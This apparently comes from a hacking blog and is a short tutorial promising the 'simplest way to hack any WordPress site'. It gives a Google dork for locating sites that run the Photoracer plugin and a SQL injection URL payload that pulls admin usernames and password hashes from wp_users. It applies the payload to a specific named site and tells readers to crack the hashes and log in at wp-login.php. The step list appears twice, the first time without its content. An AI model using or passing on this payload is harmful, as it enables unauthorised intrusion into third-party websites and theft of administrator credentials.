In this post I'll tell you the SIMPLEST WAY TO HACK ANY WORDPRESS BASED SITE.
First we'll use this dork to search website with the help of Google
Results:
I'm now gonna test one of them..
For eg..
Now add the Exploit..
And now the site address will become..
Now you can see the ADMIN and PASS....just crack the HASHES and you're done..
Site Admin Login page for WP
First we'll use this dork to search website with the help of Google
inurl:"wp-content/plugins/photoracer/viewimg.php?id="
Results:
I'm now gonna test one of them..
For eg..
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2
Now add the Exploit..
/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--This is the exploit.. (GIVEN ABOVE)
And now the site address will become..
http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
Now you can see the ADMIN and PASS....just crack the HASHES and you're done..
Site Admin Login page for WP
http://www.SITE-ADDRESS/wp-login.php